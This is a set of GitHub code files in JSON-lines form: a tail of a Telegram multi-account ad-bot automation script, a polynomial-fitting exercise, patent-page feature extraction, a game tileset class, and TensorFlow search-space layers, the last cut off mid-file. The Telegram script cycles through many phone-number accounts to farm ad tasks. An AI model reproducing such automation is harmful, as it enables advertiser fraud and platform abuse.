connect(k)\r\n\t\t\tprint(\"\\r\t\t\t\t\t\t\t\t\t\t\t\t\",end=\"\\r\")\r\n\t\t\t\r\n\t\texcept:\r\n\t\t\tprint(do+\"=\"*50)\r\n\t\t\tprint(\"SĐT(phone) Này Lỗi Rồi, Vui Lòng Chuyển SĐT(phone) Khác.\")\r\n\t\t\tprint(\"=\"*50+\"\\n\"+trang)\r\n\t\t\tcontinue\r\n\t\tprint(vang+\"=\"*50)\r\n\t\tprint(\"Bạn đang tool SĐT(phone): {}\".format(k))\r\n\t\tget_entity()\r\n\t\ttry:\r\n\t\t\twhile True:\r\n\t\t\t\tif(len(toolBot) == 0):\r\n\t\t\t\t\tif(visit == True):\r\n\t\t\t\t\t\tprint(\"Hết ADS Visit Bot.\")\r\n\t\t\t\t\t\tvisit = False\r\n\t\t\t\t\t\tchannel = True\r\n\t\t\t\t\t\tget_entity()\r\n\t\t\t\t\t\t\r\n\t\t\t\t\telif(channel == True):\r\n\t\t\t\t\t\tprint(\"Hết ADS Join Channel Bot.\")\r\n\t\t\t\t\t\tchannel = False\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tprint(\"Hết ADS All Bot.\")\r\n\t\t\t\t\t\tbreak\r\n\t\t\t\tif(visit == True):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tfor i in toolBot:\r\n\t\t\t\t\t\t\tten = i[0]\r\n\t\t\t\t\t\t\tchannel_id = i[1]\r\n\t\t\t\t\t\t\tentity_id = i[2]\r\n\t\t\t\t\t\t\tdtt = Bot_url(ten)\r\n\t\t\t\t\t\t\tif dtt[0] == 0:\r\n\t\t\t\t\t\t\t\ttoolBot.remove(i)\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telif dtt[0] == 2:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tget_url(name=ten,url=dtt[0],skip=dtt[1],msg_id=dtt[2])\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\ttoolBot.clear()\r\n\t\t\t\t\t\tvisit = False\r\n\t\t\t\t\t\tchannel = True\r\n\t\t\t\t\t\tget_entity()\r\n\t\t\t\tif (channel == True):\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tfor p in toolBot:\r\n\t\t\t\t\t\t\tten = p[0]\r\n\t\t\t\t\t\t\tchannel_id = p[1]\r\n\t\t\t\t\t\t\tentity_id = p[2]\r\n\t\t\t\t\t\t\tdtt = Bot_joind_channel(ten)\r\n\t\t\t\t\t\t\tif dtt[0] == 0:\r\n\t\t\t\t\t\t\t\ttoolBot.remove(p)\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telif dtt[0] == 2:\r\n\t\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tjoin_channel(name=ten,id_joined=dtt[2],msg_id=dtt[4],joined=dtt[1],skip=dtt[3])\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tchannel = False\r\n\t\t\t\tif (visit == False and channel == False):\r\n\t\t\t\t\tvisit = True\r\n\t\t\t\t\tchannel = False\r\n\t\t\t\t\ttoolBot.clear()\r\n\t\t\t\t\tclient.disconnect()\r\n\t\t\t\t\tbreak\r\n\t\texcept:\r\n\t\t\tprint(do+\"=\"*50)\r\n\t\t\tprint(\"\\nSĐT(phone): {} Lỗi\\nNext SĐT(phone) Tiếp Theo!!!\\n\".format(k))\r\n\t\t\tprint(\"=\"*50+\"\\n\"+trang)\r\n\t\t\ttoolBot.clear()\r\n\t\t\tclient.disconnect()\r\n\tprint(xanh+\"=\"*50)\r\n\tprint(\"Đã Tool Hết List SĐT(phone)!!!\")\r\n\tprint(\"=\"*50+\"\\n\")\r\n\ttoolBot.clear()\r\n\tif(lap_vo_han 
== \"\" or lap_vo_han == \" \" or lap_vo_han == \"enter\" or lap_vo_han == \"ENTER\"):\r\n\t\texit(0)\r\n\telse:\r\n\t\ttime_lap = 14400\r\n\t\tfor i in range(time_lap,0,-1):\r\n\t\t\tif(i > 3600):\r\n\t\t\t\tgio = i / 3600\r\n\t\t\t\tphut = (i % 3600) / 60\r\n\t\t\t\tgiay = ((i % 3600) % 60)% 60\r\n\t\t\t\tprint(xanh+\"\\rĐợi {C1}{H}{C2} giờ {C1}{M}{C2} phút {C1}{S}{C2} giây\".format(C1=vang,C2=xanh,H=int(gio),M=int(phut),S=int(giay)),end=\" \")\r\n\t\t\t\tsleep(1)\r\n\t\t\telse:\r\n\t\t\t\tphut = i / 60\r\n\t\t\t\tgiay = i % 60\r\n\t\t\t\tprint(xanh+\"\\rĐợi {C1}{M}{C2} phút {C1}{S}{C2} giây\".format(C1=vang,C2=xanh,M=int(phut),S=int(giay)),end=\" \")\r\n\t\t\t\tsleep(1)\r\n\t\tcontinue","repo_name":"jokervtn94/jokervtn94","sub_path":"TeleBot.py","file_name":"TeleBot.py","file_ext":"py","file_size_in_byte":13967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37402756580","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom copy import deepcopy\n\n# Ensure that matplotlib, numpy are installed\n# pip install matplotlib or pip3 install matplotlib\n# pip install numpy or pip3 install numpy\n\ndef almostEqual(x,y):\n return abs(x-y)<10**-8\n\ndef gaussianElimination(m):\n def pivot(m, n, i):\n max_row = max(range(i, n), key=lambda r: abs(m[r][i]))\n m[i], m[max_row] = m[max_row], m[i]\n\n # forward elimination\n n = len(m[0])\n for i in range(n):\n pivot(m, n, i)\n for j in range(i+1, n):\n m[j] = [m[j][k] - m[i][k]*m[j][i]/m[i][i] for k in range(n+1)]\n\n if m[n-1][n-1] == 0: raise ValueError('No unique solution')\n\n # backward substitution\n x = [0] * n\n for i in range(n-1, -1, -1):\n s = sum(m[i][j] * x[j] for j in range(i, n))\n x[i] = (m[i][n] - s) / m[i][i]\n return x\n\n\ndef splitTupleToXY(L):\n x,y = map(list,zip(*L))\n return x, y\n\ndef evalPolynomial(coeffs, x):\n return sum(coeff*x**i for i,coeff in enumerate(coeffs[::-1]))\n\ndef checkValues(xList, yList, coeffs):\n for i in range(len(xList)):\n if not almostEqual(evalPolynomial(coeffs, xList[i]), yList[i]):\n return False\n return True\n\ndef fitPolynomial(xList, yList):\n degree = 0\n while True:\n fit = np.polynomial.polynomial.polyfit(xList, yList, degree) # Numpy is way more efficient than python for analysing lists\n fit = np.flip(fit) # Fit is reversed at first, as in c + bx + ax^2, which is not so useful, so we use flip() to fix it\n if checkValues(xList, yList, fit):\n return fit\n degree += 1\n\n# Some points\n# (1,3)\n# (2,6)\n# (3,14)\n# Now set up some equations\n# a(1)**2 + b(1) + c = 3\n# a(2)**2 + b(2) + c = 6\n# a(3)**2 + b(3) + c = 14\n# Now solve the system using gaussian elimination\n# Use these values to identify the polynomial\n# This only works if there are no zeros in the input function\n# Mr. Jackson, can you help me figure out how to make it work if there are zero points? 
as in intercepts?\n# If you go down to line 106 and change fitPolynomial to fitPolynomialGaussian, it will fail when dividing by zero\n\ndef fitPolynomialGaussian(xList, yList):\n eliminationSet = []\n for i in range(len(xList)):\n eliminationSet.append([xList[i]**2, xList[i], 1, yList[i]])\n print(eliminationSet)\n variables = gaussianElimination(eliminationSet)\n print(variables)\n return variables\n\ndef graphPolynomialFunction(P, xStep, xStart, xEnd, xPoints, yPoints):\n xList = []\n x = xStart\n while x <= xEnd:\n xList.append(x)\n x += xStep\n yList = [evalPolynomial(P, x) for x in xList]\n\n plt.plot(xList, yList, c=\"blue\")\n\n plt.scatter(xPoints, yPoints, c=\"orange\")\n\n plt.show()\n\ndef findPolynomialFunction(D):\n xList, yList = splitTupleToXY(D)\n polynomial = fitPolynomialGaussian(xList, yList)\n print(polynomial)\n xListSorted, yListSorted = splitTupleToXY(sorted(D))\n graphPolynomialFunction(polynomial, 0.1, xListSorted[0]-1, xListSorted[-1]+1, xList, yList)\n return polynomial\n\nA = [(0,6), (-2,0), (-3,0)]\nB = [(-3,5280.5),(-2,675.4),(-1,27.2),(4,17732.2),(1,41.8),(2,470.6),(3,3500.4)]\nD = [(1,3),(2,6),(3,14)]\n#xList, yList = splitTupleToXY(A)\n#print(fitPolynomial(xList, yList))\nfindPolynomialFunction(A)","repo_name":"PicoPlanetDev/computational-math","sub_path":"unit-5/findPolynomialFunction.py","file_name":"findPolynomialFunction.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15123498741","text":"import numpy as np\nimport pandas as pd\nimport re\nimport string\n\nPATENT_NUMBER_PATTERN = re.compile(r'\b(\d{1}[,\s]\d{3}[,\s]\d{3})\b')\nDATE_URL_PATTERN = re.compile(r'(\d{1,2}[./-]\d{1,2}[./-]\d{4}|'\n r'\d{4}[./-]\d{1,2}[./-]\d{1,2}|'\n r'20\d{2}[0-3]\d{1}[0-3]\d{1}|'\n r'[0-3]\d{1}[0-3]\d{1}20\d{2})')\nDATE_HTML_PATTERN = re.compile(r'(\d{1,2}[./-]\d{1,2}[./-]\d{4}|'\n r'\d{4}[./-]\d{1,2}[./-]\d{1,2})')\nCOPYRIGHT_PATTERN = [\n r'(copyright 19\d{2})|(copyright 20\d{2})',\n r'(\(c\) copyright|copyright \(c\))',\n r'(\(c\) 19\d{2})|(\(c\) 20\d{2})|(\(c\)19\d{2})|(\(c\)20\d{2})']\n\nUS_CODE_TERMS = ['35 u.s.c. § 287', '35 usc § 287', '35 u.s.c. 
§287', \n '35 usc §287', '35 u.s.c.', 'section 287']\nPRODUCT_TERMS = ['product manual', 'user guide', 'user manual',\n 'product specification', 'product details',\n 'product description']\nNEWS_TERMS = ['news', 'blog', 'article']\n\ndef get_url_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses URL column to add new columns related to URL properties.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional URL-related columns.\n \"\"\"\n\n df = original_df.copy()\n\n df['url'] = df.url.apply(lambda s: s.lower())\n\n # \"patent\" in URL\n df.loc[:, 'url_patent'] = df.url.apply(lambda s: 'patent' in s)\n\n # \"product\" in URL\n df.loc[:, 'url_product'] = df.url.apply(lambda s: 'product' in s)\n\n # number of characters in URL\n df['len_url'] = df['url'].apply(lambda x: len(x))\n\n # news terms in URL\n df.loc[:, 'url_news'] = df.url.apply(\n lambda s: any(term in s for term in NEWS_TERMS))\n\n # date format detected in URL\n df.loc[:, 'url_date'] = df.url.apply(\n lambda s: len(re.findall(DATE_URL_PATTERN, s)) > 0)\n\n return df\n\ndef add_html_column(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Adds column containing HTML for each sample.\n\n Args:\n original_df: original DataFrame containing filename column.\n\n Returns:\n Original DataFrame with additional HTML column.\n \"\"\"\n\n df = original_df.copy()\n\n df['html'] = ''\n\n for i, r in df.iterrows():\n with open(r.filename, 'r', encoding='utf-8', errors='ignore') as f:\n df.loc[i, 'html'] = f.read()\n \n df['html'] = df.html.apply(lambda r: str(r).lower())\n \n print('Successfully added HTML column')\n return df\n\ndef get_html_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses HTML column to add new columns related to HTML properties.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional HTML-related columns.\n \"\"\"\n df = original_df.copy()\n\n if 'html' not in df.columns:\n raise AttributeError('HTML column missing from DataFrame.')\n \n # number of times \"patent\" appears in HTML\n df.loc[:, 'html_n_patent'] = df.html.apply(lambda s: s.count('patent'))\n\n # number of times US code 287 appears in HTML\n df['n_us_code'] = 0\n\n # number of times product-specific terms appear in HTML\n df['n_product'] = 0\n\n for i, r in df.iterrows():\n n_us_code = sum([r.html.lower().count(code) for code in US_CODE_TERMS])\n df.loc[i, 'n_us_code'] = n_us_code\n\n n_product = sum([r.html.lower().count(s) for s in PRODUCT_TERMS])\n df.loc[i, 'n_product'] = n_product\n\n # number of times the patent number pattern appears in HTML\n df.loc[:, 'n_patent_strings'] = df.html.apply(\n lambda s: len(re.findall(PATENT_NUMBER_PATTERN, s)))\n\n # number of date-like substrings in HTML\n df.loc[:, 'n_dates'] = df.html.apply(\n lambda s: len(re.findall(DATE_HTML_PATTERN, s)))\n\n # date format detected in HTML\n df['contains_date'] = df['n_dates'] > 0\n return df\n\ndef get_footer_features(original_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\" Uses HTML column to detect footers and add columns related to footers.\n\n Args:\n original_df: original DataFrame.\n\n Returns:\n Original DataFrame with additional footer-related columns.\n \"\"\"\n\n df = original_df.copy()\n\n # to adhere to copyright pattern\n df['html'] = df['html'].apply(lambda s: s.replace('©', '(c)'))\n\n non_alnum_allowed = set(string.punctuation).union(set(['\\n', ' ']))\n df['html_stripped'] = df.html.apply(\n lambda s: ''.join([c for c in s if c.isalnum() or c in 
non_alnum_allowed]))\n\n def split_index_end(s):\n indices = [] \n for k in COPYRIGHT_PATTERN:\n for m in re.finditer(k, s):\n indices.append(m.start(0))\n return len(s) - indices[0] if len(indices) else 0\n\n df['split_idx'] = df.html_stripped.apply(\n lambda r: r[-1500:] if len(str(r)) > 1500 else r)\\\n .apply(lambda r: str(r).replace('\\n', ' ').replace('*', ''))\\\n .apply(lambda r: split_index_end(str(r)))\n\n # adds footer column \n df['footer'] = ''\n df.loc[df['split_idx'] > 0, 'footer'] = df[df['split_idx'] > 0].apply(\n lambda r: r['html_stripped'][-r['split_idx']:], axis=1)\n\n # True if \"patent\" in footer\n df['footer_patent'] = df.footer.str.contains('patent')\n\n df.drop(columns=['html_stripped', 'split_idx', 'footer'], inplace=True)\n\n return df\n\ndef get_general_features(original_df: pd.DataFrame,\n save: bool = True,\n save_as: str = None) -> pd.DataFrame:\n \"\"\" Generates general URL and HTML-specific features for DataFrame.\n\n Args:\n original_df: DataFrame containing filename, url, category columns\n save: Specifies if generated DataFrame should be saved. If True,\n saves as save_as filename. Defaults to True.\n save_as: Filename to save DataFrame as. Defaults to None.\n\n Raises:\n AttributeError: If save is True, but no save_as filename is specified.\n\n Returns:\n DataFrame containing additional URL and HTML-specific features.\n \"\"\"\n\n df = original_df.copy() \n df = get_url_features(df)\n df = add_html_column(df)\n df = get_html_features(df)\n df = get_footer_features(df)\n\n if save:\n if not save_as:\n raise AttributeError('Save directory is not specified.')\n df.to_csv(save_as,\n encoding='utf-8',\n header=True,\n index=False)\n print('Saved general features DataFrame.')\n \n return df","repo_name":"marikomakhm/vpm-classifier","sub_path":"feature_processing.py","file_name":"feature_processing.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33485592032","text":"# Class to contain information about a tileset\n# Contains:\n#\tThe data of the actual tileset\n#\tThe size of the tileset\n#\tThe size of the individual tiles\n#\t\n#\tFunctions for getting a specific tile (returning a tile structure)\n#\t\n#\n#\n#\n\nfrom base import Base\nfrom tile import Tile\n\nclass Tileset (Base):\n\tdef __init__(self):\n\t\tBase.__init__(self)\n\t\t\n\t\tself.map = None\t\t\t\t\t\t# The associated map\n\t\t\n\t\tself.data =\tNone\t\t\t \t\t# The tileset image\n\t\tself.size = [0, 0] \t\t\t\t\t# In pixels\n\t\tself.sizeTiles = [0, 0] \t\t\t# In tiles\n\t\t\n\t\tself.tileSize = [0, 0]\t\t\t\t# In pixels\n\t\t\n\t\"\"\"Loads an image to use as a tileset\n\t\tArgs:\n\t\t\tfilename - The path to the image to use.\n\t\t\tsize - The size of each tile (in pixels)\n\t\t\t\n\t\tReturns:\n\t\t\tTrue if succesfull, False if not\n\t\"\"\"\n\tdef load(self, filename, size):\n\t\t# Try to load the file\n\t\timage = self.map.drawer.loadImage(filename)\n\t\tif not image:\n\t\t\tprint(\"Could not load image at \" + filename)\n\t\t\treturn False\n\t\t\t\n\t\t# Okay, file loaded.\n\t\tself.data = image\n\t\t\n\t\t# Set the tilesize\n\t\tself.tileSize = size\n\t\t\n\t\t# Get the size of the image\n\t\tself.size = self.map.drawer.getRes(image)\n\t\t\n\t\t# Figure out the size of the set in tiles\n\t\tself.sizeTiles[0] = int(self.size[0] / self.tileSize[0])\n\t\tself.sizeTiles[1] = int(self.size[1] / self.tileSize[1])\n\t\n\t\"\"\"Get the top and bottom coords for a 
tile\n\t\n\t\tArgs:\n\t\t\ttileCoord - The coordinate of the tile (in tiles)\n\t\t\t\n\t\tReturns:\n\t\t\tA list in the form ((topX, topY), (bottomX, bottomY))\n\t\"\"\"\n\tdef _getCoords(self, tileCoord):\n\t\t# Do some simple maths to get the coords\n\t\ttop = (tileCoord[0]*self.tileSize[0], tileCoord[1]*self.tileSize[1])\n\t\tbottom = (top[0] + self.tileSize[0], top[1] + self.tileSize[1])\n\t\t\n\t\t# Make sure these values are within the size of the tileset\n\t\tif top[0] < 0 or top[1] < 0 or bottom[0] > self.size[0] or bottom[1] > self.size[1]:\n\t\t\t# One of the values is too big\n\t\t\tprint (\"Warning: The tile coords requested are out of the bounds of the tileset!\")\n\t\t\tprint (\"The coordinates returned are of the tile (0, 0)\")\n\t\t\treturn ((0, 0), (0, 0))\n\t\telse:\n\t\t\treturn (top, bottom)\n\t\t\t\n\t\"\"\"Get a tile\n\t\t\n\t\tArgs:\n\t\t\ttileCoord - The coordinate of the tile (in tiles)\n\t\t\t\n\t\tReturns:\n\t\t\tA tile structure representing the requested tile\n\t\"\"\"\n\tdef getTile(self, tileCoord):\n\t\ttile = Tile()\n\t\ttile.tileset = self\n\t\ttile.topcoord, tile.bottomcoord = self._getCoords(tileCoord)\n\t\t\n\t\treturn tile\n","repo_name":"bombpersons/RPGlibs","sub_path":"tilez/tileset.py","file_name":"tileset.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"24730365678","text":"\"\"\"\r\nset custom layers which can change inplanes and outplanes\r\n\"\"\"\r\nimport logging\r\nfrom tensorflow.keras import layers, Model\r\nimport tensorflow as tf\r\n\r\n\r\nclass SuperBatchNormalization(layers.Layer):\r\n def __init__(self, \r\n max_filters_in,\r\n momentum=0.9, \r\n epsilon=0.00001, \r\n center=True, \r\n scale=True,\r\n axis=-1,\r\n beta_initializer='zeros', \r\n gamma_initializer='ones',\r\n moving_mean_initializer='zeros', \r\n moving_variance_initializer='ones',\r\n inference_update_stat = False,\r\n name=None,\r\n **kwargs):\r\n super(SuperBatchNormalization, self).__init__(name=name, **kwargs)\r\n self.momentum = momentum\r\n self.momentum_rest = 1.0 - momentum\r\n if axis < 0 : axis += 4\r\n self.axes = [0,1,2,3][:axis]+[0,1,2,3][axis+1:]\r\n self.momentum = momentum\r\n self.epsilon = epsilon\r\n self.center = center\r\n self.scale = scale\r\n self.beta_initializer = beta_initializer\r\n self.gamma_initializer = gamma_initializer\r\n self.moving_mean_initializer = moving_mean_initializer\r\n self.moving_variance_initializer = moving_variance_initializer\r\n self.inference_update_stat = inference_update_stat\r\n \r\n\r\n self.max_filters_in = max_filters_in\r\n\r\n self.gamma = self.add_weight(name=self.name+'/gamma',\r\n shape=(self.max_filters_in,),\r\n initializer=self.gamma_initializer,\r\n trainable=scale)\r\n\r\n self.beta = self.add_weight(name=self.name+'/beta',\r\n shape=(self.max_filters_in,),\r\n initializer=self.beta_initializer,\r\n trainable=center)\r\n\r\n self.moving_mean = self.add_weight(name=self.name+'/moving_mean',\r\n shape=(self.max_filters_in,),\r\n initializer=self.moving_mean_initializer,\r\n trainable=False)\r\n\r\n self.moving_var = self.add_weight(name=self.name+'/moving_var',\r\n shape=(self.max_filters_in,),\r\n initializer=self.moving_variance_initializer,\r\n trainable=False)\r\n self.concat = layers.Concatenate(axis=-1, name='cat')\r\n \r\n\r\n def call(self, x, training=True, **kwargs):\r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n logging.debug('use bn')\r\n\r\n mean, var = 
tf.nn.moments(x, axes=self.axes, keepdims=False, name='moments')\r\n\r\n gamma = tf.slice(self.gamma, [0], [filters_in])\r\n beta = tf.slice(self.beta, [0], [filters_in])\r\n\r\n if not self.inference_update_stat: \r\n logging.debug('bn')\r\n out = tf.nn.batch_normalization(x, mean, var, \r\n offset=beta, scale=gamma, \r\n variance_epsilon=self.epsilon, name='bn')\r\n\r\n else:\r\n moving_mean = tf.slice(self.moving_mean, [0], [filters_in])\r\n moving_var = tf.slice(self.moving_var, [0], [filters_in])\r\n \r\n moving_mean = self.momentum * mean + self.momentum_rest * moving_mean\r\n moving_var = self.momentum * var + self.momentum_rest * moving_var\r\n self.moving_mean.assign( self.concat([moving_mean, self.moving_mean[x.shape[-1]:]]) )\r\n self.moving_var.assign( self.concat([moving_var, self.moving_var[x.shape[-1]:]]) )\r\n\r\n out = tf.nn.batch_normalization(x, \r\n moving_mean, moving_var, \r\n offset=beta, scale=gamma, \r\n variance_epsilon=self.epsilon, name='bn')\r\n \r\n return out\r\n\r\nclass SuperConv2d(layers.Layer):\r\n def __init__(self, \r\n max_filters_in, \r\n max_filters_out,\r\n max_kernel_size, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=None,\r\n use_bias=True,\r\n kernel_initializer='glorot_uniform', \r\n bias_initializer='zeros',\r\n kernel_regularizer=None, \r\n bias_regularizer=None,\r\n name=None, **kwargs):\r\n super(SuperConv2d, self).__init__(name=name, **kwargs)\r\n\r\n self.max_kernel_size = max_kernel_size\r\n self.max_filters_in = max_filters_in\r\n self.max_filters_out = max_filters_out\r\n \r\n self.strides = [strides]*2 if type(strides) == int else strides\r\n self.padding=padding\r\n self.data_format=data_format\r\n\r\n self.use_bias=use_bias\r\n self.kernel_initializer=kernel_initializer\r\n self.bias_initializer=bias_initializer\r\n self.kernel_regularizer=kernel_regularizer\r\n self.bias_regularizer=bias_regularizer\r\n\r\n \r\n self.w = self.add_weight(name=self.name+'/kernel',\r\n shape=(max_kernel_size, max_kernel_size, max_filters_in, max_filters_out),\r\n initializer=self.kernel_initializer,\r\n trainable=True)\r\n if self.use_bias:\r\n self.b = self.add_weight(name=self.name+'/bias',\r\n shape=(max_filters_out,),\r\n initializer=self.bias_initializer,\r\n trainable=True)\r\n \r\n def call(self, x, training=None, filters_out=None, kernel_size=None, **kwargs):\r\n \r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n filters_out = filters_out if filters_out is not None else self.max_filters_out\r\n \r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n assert kernel_size <= self.max_kernel_size, (kernel_size, self.max_kernel_size)\r\n assert filters_out <= self.max_filters_out\r\n \r\n weights = tf.slice(self.w, [0]*4, [kernel_size, kernel_size, filters_in, filters_out])\r\n\r\n conv = tf.nn.conv2d(x, filters=weights, strides=self.strides, \r\n padding=self.padding, data_format=self.data_format,\r\n name='conv')\r\n\r\n out = conv\r\n \r\n if self.use_bias:\r\n bias = tf.slice(self.b, [0], [filters_out])\r\n out = out + bias\r\n \r\n if self.kernel_regularizer:\r\n self.add_loss(self.kernel_regularizer(weights), inputs=True)\r\n if self.bias_regularizer:\r\n self.add_loss(self.bias_regularizer(bias), inputs=True)\r\n\r\n return out\r\n\r\n\r\nclass SuperDepthwiseConv2D(layers.Layer):\r\n def __init__(self, \r\n max_filters_in,\r\n max_kernel_size, \r\n strides=[1,1], \r\n padding='SAME', \r\n max_depth_multiplier=1,\r\n data_format=None,\r\n use_bias=True,\r\n 
depthwise_initializer='glorot_uniform', \r\n bias_initializer='zeros',\r\n depthwise_regularizer=None, \r\n bias_regularizer=None, \r\n name=None, **kwargs):\r\n super(SuperDepthwiseConv2D, self).__init__(name=name, **kwargs)\r\n \r\n strides = [strides]*2 if type(strides) == int else strides\r\n self.strides = [1] + strides + [1]\r\n\r\n self.max_kernel_size = max_kernel_size\r\n self.max_depth_multiplier = max_depth_multiplier\r\n self.max_filters_in = max_filters_in\r\n\r\n\r\n \r\n self.padding=padding\r\n self.data_format=data_format\r\n\r\n self.use_bias=use_bias\r\n self.depthwise_initializer=depthwise_initializer\r\n self.bias_initializer=bias_initializer\r\n self.depthwise_regularizer=depthwise_regularizer\r\n self.bias_regularizer=bias_regularizer\r\n\r\n self.w = self.add_weight(name=self.name+'/kernel',\r\n shape=(max_kernel_size, max_kernel_size, max_filters_in, max_depth_multiplier),\r\n initializer=self.depthwise_initializer,\r\n trainable=True)\r\n if self.use_bias:\r\n self.b = self.add_weight(name=self.name+'/bias',\r\n shape=(max_filters_in*max_depth_multiplier),\r\n initializer=self.bias_initializer,\r\n trainable=True)\r\n \r\n\r\n def call(self, x, training=True, kernel_size=None, depth_multiplier=None, **kwargs):\r\n\r\n \r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n depth_multiplier = depth_multiplier if depth_multiplier is not None else self.max_depth_multiplier\r\n\r\n filters_in = x.shape[-1]\r\n assert filters_in <= self.max_filters_in\r\n assert kernel_size <= self.max_kernel_size\r\n assert depth_multiplier <= self.max_depth_multiplier\r\n\r\n\r\n \r\n weights = tf.slice(self.w, [0]*4, [kernel_size, kernel_size, filters_in, depth_multiplier])\r\n\r\n\r\n conv = tf.nn.depthwise_conv2d(\r\n x, weights, strides=self.strides, padding=self.padding,\r\n data_format=self.data_format, name='dconv'\r\n )\r\n\r\n\r\n out = conv\r\n \r\n if self.use_bias:\r\n\r\n bias = tf.slice(self.b, [0], [filters_in*depth_multiplier])\r\n out = out + bias\r\n \r\n \r\n if self.depthwise_regularizer:\r\n self.add_loss(self.depthwise_regularizer(weights), inputs=True)\r\n if self.bias_regularizer:\r\n self.add_loss(self.bias_regularizer(bias), inputs=True)\r\n \r\n return out\r\n\r\nclass Activation(layers.Layer):\r\n def __init__(self, activation, name=None, **kwargs):\r\n super(Activation, self).__init__(name=name, **kwargs)\r\n if activation in ['linear', 'relu', 'elu', 'selu', 'softmax', 'sigmoid', 'hard_sigmoid']:\r\n self.activate = layers.Activation(name, name=name)\r\n elif activation == 'relu6':\r\n self.activate = lambda x : tf.nn.relu6(x, name=name)\r\n elif activation == 'prelu':\r\n self.activate = layers.PReLU(shared_axes=[1,2], name=name)\r\n elif activation == 'swish':\r\n self.activate = tf.nn.swish\r\n else:\r\n raise ValueError('Activate name error , donot exist %s' % name)\r\n def call(self, x, **kwargs):\r\n x = self.activate(x)\r\n return x\r\n\r\n\r\nclass SuperMBConvBlock(Model):\r\n def __init__(self, \r\n max_filters_in,\r\n max_filters_out, \r\n max_expand_ratio, \r\n max_kernel_size,\r\n se_ratio, \r\n weight_decay, \r\n strides , \r\n use_shortcut=True,\r\n drop_connect_rate=None, \r\n data_format=None,\r\n activation='relu6', \r\n name=None, **kwargs):\r\n super(SuperMBConvBlock, self).__init__(name=name, **kwargs)\r\n \r\n self.use_shortcut = use_shortcut\r\n self.max_filters_in = max_filters_in\r\n self.max_filters_out = max_filters_out\r\n self.max_expand_ratio = max_expand_ratio\r\n self.max_kernel_size = 
max_kernel_size\r\n\r\n \r\n strides = [strides]*2 if type(strides) == int else strides\r\n max_expand_filters = max_filters_in * max_expand_ratio\r\n\r\n if max_expand_ratio != 1:\r\n self.expand_conv = SuperConv2d(max_filters_in=max_filters_in, \r\n max_filters_out=max_expand_filters,\r\n max_kernel_size=1, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=data_format,\r\n use_bias=False,\r\n kernel_initializer='he_normal', \r\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='expand_conv')\r\n self.expand_bn = SuperBatchNormalization(max_expand_filters, name='bn')\r\n self.expand_act = Activation(activation, name = activation)\r\n\r\n\r\n\r\n #print('filters_in', expand_filters)\r\n #Depthwise Convlution\r\n self.extract_dconv = SuperDepthwiseConv2D(max_filters_in=max_expand_filters,\r\n max_kernel_size=max_kernel_size, \r\n strides=strides, \r\n padding='SAME', \r\n max_depth_multiplier=1,\r\n data_format=data_format,\r\n use_bias=False,\r\n depthwise_initializer='he_normal', \r\n depthwise_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='extract_dconv')\r\n self.extract_bn = SuperBatchNormalization(max_expand_filters, name='extract_bn')\r\n self.extract_act = Activation(activation, name=activation)\r\n\r\n \r\n self.project_conv = SuperConv2d(max_filters_in=max_expand_filters, \r\n max_filters_out=max_filters_out,\r\n max_kernel_size=1, \r\n strides=(1, 1), \r\n padding='SAME', \r\n data_format=data_format,\r\n use_bias=False,\r\n kernel_initializer='he_uniform', \r\n kernel_regularizer=tf.keras.regularizers.l2(weight_decay), \r\n name='project_conv')\r\n self.project_bn = SuperBatchNormalization(max_filters_out, name='project_bn')\r\n \r\n\r\n if use_shortcut:\r\n if drop_connect_rate and (0.0 < drop_connect_rate < 1.0) :\r\n self.dp = layers.Dropout(drop_connect_rate, noise_shape=(None, 1, 1, 1),\r\n name='dp')\r\n else:\r\n self.dp = lambda x, training : x\r\n\r\n \r\n def call(self, x, training, filters_out=None, expand_ratio=None, kernel_size=None):\r\n kernel_size = kernel_size if kernel_size is not None else self.max_kernel_size\r\n filters_out = filters_out if filters_out is not None else self.max_filters_out\r\n expand_ratio = expand_ratio if expand_ratio is not None else self.max_expand_ratio\r\n \r\n filters_in = x.shape[-1]\r\n assert kernel_size <= self.max_kernel_size\r\n assert filters_in <= self.max_filters_in\r\n assert filters_out <= self.max_filters_out\r\n assert expand_ratio <= self.max_expand_ratio\r\n \r\n origin = x\r\n if self.max_expand_ratio != 1:\r\n x = self.expand_conv(x, training, kernel_size=1, filters_out=filters_in*expand_ratio)\r\n x = self.expand_bn(x, training=training)\r\n x = self.expand_act(x)\r\n\r\n\r\n\r\n x = 